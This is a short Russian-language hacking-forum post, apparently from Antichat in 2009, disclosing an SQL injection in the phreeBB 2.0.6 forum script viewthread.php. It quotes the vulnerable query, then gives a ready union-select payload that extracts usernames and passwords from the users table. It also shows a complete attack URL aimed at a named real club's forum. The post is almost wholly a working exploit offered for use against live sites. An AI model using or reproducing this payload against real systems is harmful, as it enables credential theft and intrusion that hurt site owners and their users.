27.08.2009, 09:30
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
phreeBB 2.0.6
Не путать с phpBB!
SQL-Inj
Продукт: phreeBB
Версия: 2.0.6
Уязвимый скрипт: viewthread.php
PHP код:
$result = mysql_query("SELECT * FROM viewForums WHERE view=$id");
$msgData = mysql_fetch_array($result);
Эксплойт:
Код:
-1/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+
Пример:
Код:
http://www.vespaclubbiella.it/forum/viewthread.php?forumid=2&id=-42/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|